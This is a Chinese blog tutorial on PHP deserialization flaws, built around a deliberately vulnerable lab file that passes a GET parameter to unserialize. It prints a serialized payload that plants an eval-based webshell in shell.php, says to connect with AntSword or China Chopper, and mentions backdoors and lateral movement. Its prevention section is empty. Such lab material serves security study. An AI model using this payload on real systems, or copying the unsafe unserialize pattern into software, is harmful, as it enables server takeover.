1-反序列化漏洞

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量71 收藏
点赞数 4
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45808131/article/details/132049276
版权

漏洞原理

序列化:将对象转换成字符串

反序列化:将特定的字符串转换成对象

登录时会将session序列化写入/tmp目录下,访问首页时会验证读取session,这时将session修改,则会执行任意恶意代码。

漏洞危害

可以执行任意恶意代码,webshell,反弹shell,rce等各种危害

漏洞验证

无,后补充

漏洞利用

利用phpstudy自己搭建一个简单的靶场

//将一下代码写入文件1.php
<?php
highlight_file(__FILE__);
error_reporting(0);
header("Content-Type: text/html; charset=utf-8");
class ph0en1x{
    function __construct($test){
        $fp = fopen("shell.php","w") ;
        fwrite($fp,$test);
        fclose($fp);
    }
}
class chybeta{
    var $test = '123';
    function __wakeup(){
        $obj = new ph0en1x($this->test);
    }
}
$class5 = $_GET['test'];
$class5_unser = unserialize($class5);
//require "shell.php";
// 题目要求,获取webshell
?>

我们访问查看一下

 简单理解一下两个魔法函数:

__wakeup():执行反序列化时调用

__construct():当我们new一个对象时,就会执行这个函数

我们这里可以理解为当我们执行反序列化时会new一个对象,创建一个chybeta类,并给test复制,当new一个对象时,会执行__construct(),创建一个ph0en1x类,创建一个文件"shell.php"并将test写入"shell.php"文件。

那么我们就清楚了,我们先将序列化的格式找出来,有几种方式,自己整合改编,或者直接输出相对应的格式。

我们这里直接拿过来修改

O:7:"chybeta":1:{s:4:"test";s:29:"<?php @eval($_POST['111']);?>";}

浏览器请求

?test=O:7:"chybeta":1:{s:4:"test";s:29:"<?php @eval($_POST['111']);?>";}

这里我们的一句话木马就上传到了shell.php中,浏览器中访问网站首页

http://127.0.0.1/shell.php

然后利用中国菜刀或中国蚁剑去连接,这里注意中国菜刀没办法识别POST请求中的引号,所以纯数字型用中国菜刀,字符型用中国蚁剑,我这里使用中国蚁剑。

 

连接成功,之后我们可以进行留后门,提权,横向渗透等操作。 

漏洞工具

无,后补充

漏洞防止

无,后补充

本文章仅供学习参考,未经授权切勿拿生产环境测试。

李小白不是李白
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Web安全--反序列化漏洞(java篇)
bobo_milk的博客
11-29 3108
java反序列化参考
Web安全--反序列化漏洞详解(php篇)
bobo_milk的博客
11-29 1136
反序列化
shiro-反序列化漏洞
weixin_54217950的博客
07-26 6413
shiro反序列化漏洞
Java代码审计安全篇-反序列化漏洞
m0_63138919的博客
03-15 1260
​ 本文章参考qax的网络安全java代码审计和部分师傅审计思路以及webgoat靶场,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误 ​
java基础--反序列化漏洞原理
zyer
05-04 4480
原理 根据上篇文章可以了解到,一个类想要实现序列化和反序列化,必须要实现 java.io.Serializable 或 java.io.Externalizable 接口。 Serializable 接口是一个标记接口,标记了这个类可以被序列化和反序列化,而 Externalizable 接口在 Serializable 接口基础上,又提供了 writeExternal 和 readExternal 方法,用来序列化和反序列化一些外部元素。 其中,如果被序列化的类重写了 writeObject 和 r
1day万户协同办公平台ezEIP-success.aspx-反序列化漏洞
weixin_43167326的博客
05-24 1281
万户协同办公平台 ezEIP 是一个综合信息基础应用平台。万户协同办公平台 ezEIP success存在反序列化漏洞
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 1790
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP的反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
web安全-反序列化漏洞
weixin_43909140的博客
04-24 2871
一 XSS漏洞产生的原因是javascript可以随时插入一段代码,而Java是一种先编译再执行的语言,所以开发者认为java可能原生比javascript更安全,在开发中关注逻辑安全即可。 2015 年,Java 曾被曝出一个严重的漏洞,很多经典的商业框架都因此受到影响,其中最知名的是WebLogic。据统计,在网络中公开的 WebLogic 服务有 3 万多个。其中,中国就有 1 万多个外网可访问的 WebLogic 服务。因此,WebLogic 的反序列化漏洞意味着,国内有 1 万多台服务器可能会
网络安全-反序列化漏洞简介、攻击与防御(1)
2401_84253037的博客
04-29 230
php://phar可用来进行反序列化漏洞利用PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件,在PHP 5.3 或更高版本中默认开启,这个特性使得 PHP也可以像 Java 一样方便地实现应用程序打包和组件化。一个应用程序可以打成一个 Phar 包,直接放到 PHP-FPM 中运行。利用phar文件会以序列化的形式存储用户自定义的meta-data这一特性,拓展了php反序列化漏洞的攻击面。
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 2790
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化与反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
weblogic--反序列化漏洞测试Test
10-19
3. **CVE漏洞编号**:WebLogic反序列化漏洞往往与特定的CVE(Common Vulnerabilities and Exposures)编号相关,比如CVE-2015-4852、CVE-2017-10271等。这些漏洞影响了WebLogic的不同版本,了解具体受影响的版本有助...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
65-65.渗透测试-反序列化漏洞的出现.mp4
05-10
65-65.渗透测试-反序列化漏洞的出现.mp4
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 441
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1089
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 323
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
内网安全:IPC横向
8888的博客
07-23 697
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
xxl-job反序列化漏洞
09-12
关于xxl-job反序列化漏洞,这是一个比较严重的安全问题。该漏洞存在于xxl-job的任务调度中,攻击者可以通过构造恶意序列化数据来执行任意代码,从而导致系统被攻击或者遭受数据泄露。 为了解决这个问题,你可以采取...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值